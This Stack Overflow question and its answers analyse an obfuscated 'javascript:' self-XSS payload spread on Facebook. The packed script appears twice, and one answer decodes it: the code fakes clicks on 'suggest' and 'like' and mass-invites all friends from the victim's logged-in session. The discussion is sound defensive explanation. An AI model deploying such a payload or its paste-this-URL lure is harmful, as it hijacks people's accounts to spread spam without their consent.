
facebook - What exactly does this piece of JavaScript do? - Stack Overflow


I saw this page growing in popularity among my social circles on Facebook, what 98 percent bla bla... and it walks users through copying the below JavaScript (I added some indentation to make it more readable) into their address bar. Looks dodgy to me, but I only have a very basic knowledge of JavaScript.

Simply put, what does this do?

// Packed "javascript:" URL that the Facebook page tells visitors to paste into the
// address bar. Run that way, it executes inside whatever page is open, with the
// visitor's logged-in session. It is reproduced here for analysis only.
// The indentation was added by the asker. Everything from the opening quote on the
// `('J e=` line to the closing quote before `,62,69` is the packed string (data),
// not live statements.
javascript:(function(){
// Element ids, assigned without var/let, so they become globals. The unpacked code
// reads them by name (a, b) or through the dictionary words mw / ifo / ifc.
a='app120668947950042_jop';
b='app120668947950042_jode';
ifc='app120668947950042_ifc';
ifo='app120668947950042_ifo';
mw='app120668947950042_mwrapper';
// eval() runs whatever string the unpacker below returns. Swapping this eval for a
// call that only displays the string (as the answer on this page does) shows the
// payload without running it.
eval(function(p,a,c,k,e,r){
    // e(c): turn word index c into its base-`a` token (digits, lower-case letters via
    // toString(36), then other characters via String.fromCharCode(c+29)).
    e=function(c){
        return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))}
    ;
    // Feature test: true when String.prototype.replace accepts a function as the
    // replacement. In that case build the token->word map r once and do a single
    // global pass (c=1) that matches every \w+ run and looks it up in r.
    if(!''.replace(/^/,String)){
        while(c--)r[e(c)]=k[c]||e(c);
        k=[function(e){
            return r[e]}
        ];
        e=function(){
            return'\\w+'}
        ;
        c=1}
    ;
    // Substitute tokens in p with dictionary words; empty dictionary slots leave the
    // token unchanged.
    while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);
    // The fully substituted source text goes back to the surrounding eval().
    return p}
// Arguments: p = packed source, a = 62 (token radix), c = 69 (declared word count),
// k = word list split on '|', e = 0, r = {} (scratch map).
// NOTE(review): as reproduced here the word list holds fewer entries than the declared
// 69, so leading empty slots may have been lost in copying. Treat the decoded listing
// in the answer as the reference rather than re-deriving it from this copy.
('J e=["\\n\\g\\j\\g\\F\\g\\i\\g\\h\\A","\\j\\h\\A\\i\\f","\\o\\f\\h\\q\\i\\f\\r\\f\\k\\h\\K\\A\\L\\t","\\w\\g\\t\\t\\f\\k","\\g\\k\\k\\f\\x\\M\\N\\G\\O","\\n\\l\\i\\y\\f","\\j\\y\\o\\o\\f\\j\\h","\\i\\g\\H\\f\\r\\f","\\G\\u\\y\\j\\f\\q\\n\\f\\k\\h\\j","\\p\\x\\f\\l\\h\\f\\q\\n\\f\\k\\h","\\p\\i\\g\\p\\H","\\g\\k\\g\\h\\q\\n\\f\\k\\h","\\t\\g\\j\\z\\l\\h\\p\\w\\q\\n\\f\\k\\h","\\j\\f\\i\\f\\p\\h\\v\\l\\i\\i","\\j\\o\\r\\v\\g\\k\\n\\g\\h\\f\\v\\P\\u\\x\\r","\\B\\l\\Q\\l\\R\\B\\j\\u\\p\\g\\l\\i\\v\\o\\x\\l\\z\\w\\B\\g\\k\\n\\g\\h\\f\\v\\t\\g\\l\\i\\u\\o\\S\\z\\w\\z","\\j\\y\\F\\r\\g\\h\\T\\g\\l\\i\\u\\o"];
        d=U;
        d[e[2]](V)[e[1]][e[0]]=e[3];
        d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];
        s=d[e[2]](e[6]);
        m=d[e[2]](e[7]);
        c=d[e[9]](e[8]);
        c[e[11]](e[10],I,I);
        s[e[12]](c);
        C(D(){
            W[e[13]]()}
        ,E);
        C(D(){
            X[e[16]](e[14],e[15])}
        ,E);
        C(D(){
            m[e[12]](c);
            d[e[2]](Y)[e[4]]=d[e[2]](Z)[e[5]]}
        ,E);
        ',62,69,'||_0x95ea|x65|x69|x74|x6C|x73|x6E|x61||x76|x67|x63|x45|x6D||x64|x6F|x5F|x68|x72|x75|x70|x79|x2F|setTimeout|function|5000|x62|x4D|x6B|true|var|x42|x49|x48|x54|x4C|x66|x6A|x78|x2E|x44|document|mw|fs|SocialGraphManager|ifo|ifc|'.split('|'),0,{
}
))})();

I saw this page growing in popularity among my social circles on Facebook, what 98 percent bla bla... and it walks users through copying the below JavaScript (I added some indentation to make it more readable) into their address bar. Looks dodgy to me, but I only have a very basic knowledge of JavaScript.

Simply put, what does this do?

// Second copy of the same packed "javascript:" URL (the question body is repeated on
// this page). Pasted into the address bar, it executes inside whatever page is open,
// with the visitor's logged-in session. It is reproduced here for analysis only.
// The packed string runs from the opening quote on the `('J e=` line to the closing
// quote before `,62,69`. That span is data, not live statements.
javascript:(function(){
// Element ids stored in implicit globals (no var/let) for the unpacked code to read.
a='app120668947950042_jop';
b='app120668947950042_jode';
ifc='app120668947950042_ifc';
ifo='app120668947950042_ifo';
mw='app120668947950042_mwrapper';
// eval() executes the string returned by the unpacker. Replacing it with a call that
// only displays the string reveals the payload without running it.
eval(function(p,a,c,k,e,r){
    // e(c): encode word index c as a base-`a` token.
    e=function(c){
        return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))}
    ;
    // Taken when replace() supports a function replacement: build the token->word map
    // r, then collapse the loop below to one global \w+ pass (c=1).
    if(!''.replace(/^/,String)){
        while(c--)r[e(c)]=k[c]||e(c);
        k=[function(e){
            return r[e]}
        ];
        e=function(){
            return'\\w+'}
        ;
        c=1}
    ;
    // Token substitution; empty dictionary slots leave the token as it is.
    while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);
    // Unpacked source text, handed to the surrounding eval().
    return p}
// Arguments: packed source, radix 62, declared word count 69, '|'-separated word list,
// 0, and an empty object used as the lookup map.
// NOTE(review): the word list as shown has fewer entries than the declared 69, so this
// copy may have lost empty slots in reproduction.
('J e=["\\n\\g\\j\\g\\F\\g\\i\\g\\h\\A","\\j\\h\\A\\i\\f","\\o\\f\\h\\q\\i\\f\\r\\f\\k\\h\\K\\A\\L\\t","\\w\\g\\t\\t\\f\\k","\\g\\k\\k\\f\\x\\M\\N\\G\\O","\\n\\l\\i\\y\\f","\\j\\y\\o\\o\\f\\j\\h","\\i\\g\\H\\f\\r\\f","\\G\\u\\y\\j\\f\\q\\n\\f\\k\\h\\j","\\p\\x\\f\\l\\h\\f\\q\\n\\f\\k\\h","\\p\\i\\g\\p\\H","\\g\\k\\g\\h\\q\\n\\f\\k\\h","\\t\\g\\j\\z\\l\\h\\p\\w\\q\\n\\f\\k\\h","\\j\\f\\i\\f\\p\\h\\v\\l\\i\\i","\\j\\o\\r\\v\\g\\k\\n\\g\\h\\f\\v\\P\\u\\x\\r","\\B\\l\\Q\\l\\R\\B\\j\\u\\p\\g\\l\\i\\v\\o\\x\\l\\z\\w\\B\\g\\k\\n\\g\\h\\f\\v\\t\\g\\l\\i\\u\\o\\S\\z\\w\\z","\\j\\y\\F\\r\\g\\h\\T\\g\\l\\i\\u\\o"];
        d=U;
        d[e[2]](V)[e[1]][e[0]]=e[3];
        d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];
        s=d[e[2]](e[6]);
        m=d[e[2]](e[7]);
        c=d[e[9]](e[8]);
        c[e[11]](e[10],I,I);
        s[e[12]](c);
        C(D(){
            W[e[13]]()}
        ,E);
        C(D(){
            X[e[16]](e[14],e[15])}
        ,E);
        C(D(){
            m[e[12]](c);
            d[e[2]](Y)[e[4]]=d[e[2]](Z)[e[5]]}
        ,E);
        ',62,69,'||_0x95ea|x65|x69|x74|x6C|x73|x6E|x61||x76|x67|x63|x45|x6D||x64|x6F|x5F|x68|x72|x75|x70|x79|x2F|setTimeout|function|5000|x62|x4D|x6B|true|var|x42|x49|x48|x54|x4C|x66|x6A|x78|x2E|x44|document|mw|fs|SocialGraphManager|ifo|ifc|'.split('|'),0,{
}
))})();
edited Apr 28, 2010 at 18:10 by Alan Moore; asked Apr 28, 2010 at 16:28 by Waltzy
  • 2 I'm sure if you pasted it in your address bar you'd find out. I'd rather not do that. – ghoppe Commented Apr 28, 2010 at 16:34
  • Thank you for editing this :D Seeing 'dose' all over the place was driving me crazy. – ChronoPositron Commented Apr 28, 2010 at 16:37

3 Answers 3


I don't know why so many are downvoting this. You are absolutely right to be suspicious about packed and otherwise-obfuscated scripts, especially with the rash of malvertisements affecting FB apps at the moment.

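The first trick is to replace the eval around the unpacker's result with an alert, so you can see the code instead of executing it. (Do this on a blank page rather than in a logged-in Facebook tab: the unpacker itself still runs, and a packed script can contain further layers.) That gives you something you can easily (but boringly) manually decode to: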

// Decoded payload, as manually reconstructed by the answerer from the packed script.
// Every step acts on the page the script was pasted into, so it runs with the
// visitor's own logged-in session and needs no credentials of its own.
// s, m and c are assigned without declarations and therefore become globals.

// Hide the app's wrapper element so the following activity is not visible.
document.getElementById('app120668947950042_mwrapper').style.visibility='hidden';        
// Copy the value of a form field into another element as HTML. The field's contents
// are not shown on this page, so what markup gets injected is unknown here.
document.getElementById('app120668947950042_jop').innerHTML=document.getElementById('app120668947950042_jode').value;
s=document.getElementById('suggest');
m=document.getElementById('likeme');
// Build one synthetic 'click' event (bubbling, cancelable) and fire it on the
// 'suggest' element, so the page reacts as if the visitor had clicked it.
c=document.createEvent('MouseEvents');
c.initEvent('click',true,true);
s.dispatchEvent(c);

// Three timers, each 5000 ms after the click above.
// presumably selects every entry in the friend selector opened by 'suggest' — confirm
setTimeout(function(){
    fs.select_all()
}, 5000);
// Submits the form named 'sgm_invite_form' to the invite-dialog endpoint through the
// site's own SocialGraphManager object, with no confirmation by the visitor.
setTimeout(function(){
    SocialGraphManager.submitDialog('sgm_invite_form','/ajax/social_graph/invite_dialog.php')
}, 5000);
// Fires the same synthetic click on the 'likeme' element, then swaps in HTML taken
// from another form field (contents not shown on this page).
setTimeout(function(){
    m.dispatchEvent(c);
    document.getElementById('app120668947950042_ifo').innerHTML=document.getElementById('app120668947950042_ifc').value
}, 5000);        

That looks like it's faking clicks on the ‘like’ and ‘suggest’ buttons (and the subsequent dialogue), circumventing the normal controls FB require to interact with the site.

I'd report this page to FB.

In general, anything that asks you to enter a JavaScript URL is up to no good. This is the poor man's XSS, usually called self-XSS. By allowing someone's code onto a page through a JS URL you are trusting them to do anything they want with your logged-in session on that site, as this crude social-engineering attempt demonstrates. It's depressing if a lot of people are falling for this. Maybe it's time for browsers to disallow typing javascript: URLs in the address bar.

Curse you Netscape for inventing the ugly javascript: not-really-a-URL hack and the thousands of security holes that have resulted from it!

At first glance, it looks like a packing function, used to compress code into a string. Think of it like gzip compression.

That looks like code to invite your friends to join a group, or something along those lines.

They've been floating around facebook for a while.
